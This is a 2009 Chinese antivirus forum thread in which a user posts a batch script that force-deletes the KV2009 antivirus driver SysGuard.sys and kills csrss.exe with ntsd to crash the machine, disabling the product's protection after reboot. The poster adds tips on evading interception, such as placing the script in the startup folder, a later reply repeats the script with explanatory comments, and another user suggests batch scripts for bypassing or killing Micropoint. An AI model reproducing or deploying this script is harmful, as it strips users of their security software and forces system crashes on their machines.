微点交流论坛
» 游客:  注册 | 登录 | 帮助

 微点交流论坛 » 主动防御 » 【批处理战KV2009主动防御】  

作者:
标题: 【批处理战KV2009主动防御】
御剑临风.
禁止访问





积分 625
发帖 659
注册 2009-4-10
#1  【批处理战KV2009主动防御】

很XX,高手飘过...

今早起来一边早饭一边试验的。代码见下:

@echo off
del %systemroot%\system32\drivers\SysGuard.sys /f /q /s
set app_name=csrss.exe
echo 查找进程%app_name%,准备死机...
(tasklist /nh | findstr /i %app_name%) || (goto dead)
:dead
ntsd -c -q -pn %app_name%

原理我自己也不是太明白就不多说了,实验结果好像管用,我用虚拟机和真实机都分别试验了下,还不错。直接点的批处理脚本,如果转成EXE效果不保证了(没有实验)。但是由于有关机回写,必须强迫死机,虽然重启后KV的变态进程守护不管用了(可以用任务管理器试试),但是在重启之前你还得把善后工作做好,准备来日重生。有几点得注意:

1、不能直接用批处理写注册表(虽然可以还原SSDT之后用API写,但是不是我们追求的纯粹R3手段)
2、最好不要把bat放在EXE里,因为运行时KV十有八九可以拦截到
3、最好的地方可能是启动文件夹,或许还有些其他修改手段

的确是个很娱乐且没有什么实用价值的手段...大家可以娱乐下,不过考虑到每个人的机子效果或许不同,不用报有太大希望。

特别强调:KV08/09用户,试验时一定要把C:\Windows\system32\drivers\SysGuard.sys拷贝个到其它地方备份,如果本实验真的成功了,KV就实效了。只有拷贝回去下次重启即可恢复,或者重新安装。

※ ※ ※ 本文纯属【御剑临风.】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-4-10 12:43
查看资料  发送邮件  发短消息   编辑帖子
mamsds
银牌会员




积分 1373
发帖 1360
注册 2008-3-15
来自 乌克兰
#2  

这是何意呀?
希望楼主解释!
最好可以发到我的短消息里!
谢谢!

※ ※ ※ 本文纯属【mamsds】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

Vi Veri Veniversum Vivus Vici.
2009-4-10 17:23
查看资料  发送邮件  发短消息  QQ   编辑帖子
nonggong
新手上路





积分 17
发帖 17
注册 2009-4-10
#3  

  这种思路,前几天跟人讨论的时候,也有人谈到过。
  那程序也不干别的,就直接删除某个具体指定的文件,譬如D:\123\abc.txt。有我就删,没就算了,啥也不干。

  这样做,不知道主动防御如何处理……

  楼主这个更绝,干脆直接用个批处理,使用操作系统自己的命令来搞。这个思路,我觉得现在的主动防御有必要看一下。因为它不是任何病毒、木马,也没有传染性,就故意来搞破坏。

※ ※ ※ 本文纯属【nonggong】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-4-12 17:11
查看资料  发送邮件  发短消息   编辑帖子
wsmurderer
高级用户





积分 676
发帖 668
注册 2008-11-21
#4  

可以考虑用批处理或脚本作辅助来过微点或干掉微点,因为微点不防批处理

※ ※ ※ 本文纯属【wsmurderer】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-4-12 19:13
查看资料  发送邮件  发短消息   编辑帖子
nonggong
新手上路





积分 17
发帖 17
注册 2009-4-10
#5  



  Quote:
Originally posted by wsmurderer at 2009-4-12 19:13:
可以考虑用批处理或脚本作辅助来过微点或干掉微点,因为微点不防批处理

那肯定不行!早晚会出事的!

※ ※ ※ 本文纯属【nonggong】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-4-13 00:25
查看资料  发送邮件  发短消息   编辑帖子
御剑临风.
禁止访问





积分 625
发帖 659
注册 2009-4-10
#6  

微点肯定以后要加强恶意批处理的防御查杀

※ ※ ※ 本文纯属【御剑临风.】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-4-13 02:45
查看资料  发送邮件  发短消息   编辑帖子
ChiChou
新手上路





积分 10
发帖 10
注册 2009-4-25
#7  

@echo off
del %systemroot%\system32\drivers\SysGuard.sys /f /q /s
rem 删除KV的驱动
set app_name=csrss.exe
rem 查找csrss.exe进程的PID,当作参数传入下面的dead子过程
echo 查找进程%app_name%,准备死机...
(tasklist /nh | findstr /i %app_name%) || (goto dead)
:dead
ntsd -c -q -pn %app_name%
rem 调用ntsd,后面的参数不太了解。估计是用来挂起进程导致死机的

※ ※ ※ 本文纯属【ChiChou】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-4-25 11:16
查看资料  发送邮件  发短消息  QQ   编辑帖子



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]

北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号